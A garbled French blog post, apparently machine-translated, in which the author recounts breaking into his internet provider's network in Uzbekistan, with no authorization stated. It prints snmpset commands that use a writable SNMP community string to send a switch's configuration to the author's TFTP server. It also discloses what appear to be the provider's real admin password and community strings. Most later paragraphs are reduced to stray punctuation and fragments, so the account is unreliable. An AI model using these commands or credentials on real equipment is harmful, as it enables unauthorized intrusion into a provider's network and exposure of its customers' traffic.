Test de pénétration du réseau d'un fournisseur ou pourquoi vous ne devriez pas confier vos données à des fournisseurs en Ouzbékistan

Arrière-plan

Il y a quelques mois à peine, l'Internet domestique a commencé à fonctionner, pourrait-on dire - terriblement. Cela ne se produisait que le soir: juste au moment où le prestataire n'avait pas de spécialiste capable de faire un voyage et de faire face à ce problème ennuyeux. Curieusement, les lettres et candidatures n'ont donné aucun résultat. Selon le fournisseur, un spécialiste peut venir pendant la journée, mais qu'en est-il de moi pendant la journée si Internet ne fonctionne pas le soir. Alors, afin de passer le temps en attendant une solution au problème, j'ai décidé de faire quelques recherches en termes de sécurité dans le réseau de mon fournisseur. Si vous vous demandez ce qui s'est passé avec cela, bienvenue chez cat.

PT0.1ENUM

J'ai décidé de commencer à numériser à partir du sous-réseau 10.3XX0 / 24, car il brillait plusieurs fois lors du traçage de l'itinéraire des paquets du LAN vers le réseau mondial

80- . , , 161 - SNMP, . , public private community string , , .

PT1.1Gath

SNMP , DGS-3620-28SC - , , 20- SFP, 4 - 100/1000Base-T/SFP 4 10GBase-X SFP+. private community , snmpset.

snmpset -v2c -c $COMMUNITY $IP 1.3.6.1.4.1.171.12.1.2.18.1.1.3.3 a $TFTP_SERVER_IPP
snmpset -v2c -c $COMMUNITY $IP 1.3.6.1.4.1.171.12.1.2.18.1.1.5.3 s $FILE_NAME.cfg
snmpset -v2c -c $COMMUNITY $IP 1.3.6.1.4.1.171.12.1.2.18.1.1.7.3 s config.cfg
snmpset -v2c -c $COMMUNITY $IP 1.3.6.1.4.1.171.12.1.2.18.1.1.8.3 i 2
snmpset -v2c -c $COMMUNITY $IP 1.3.6.1.4.1.171.12.1.2.18.1.1.12.3 i 3
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
    

, j admin vfrtgb45switch( ), community strings vfrtgb45switch vfrtgb45switchrw . , , The Dude . , - MNGT vlan 4002 172.2X.X.0/15.

, mngt vlan - . , ARISTA-100G-CityPlace1 ARISTA-100GCityPlace2. , 50 L3 ( ), TCPDUMP .

PT2.1

, , ( , community string ), . : , . , , , . , , *** . , , . , , , . , . , " ". -, . , , "Turon Telecom" , . .

PT3.1 IT

, . , , , . : HTTP, SMTP . , IP DNS . , - . , - . , , .

PT4.1 En attente de réaction

Maintenant, j'ai terminé mon article et j'attends la réaction des personnes qui le liront ou la réaction du fournisseur lui-même. Merci pour l'attention.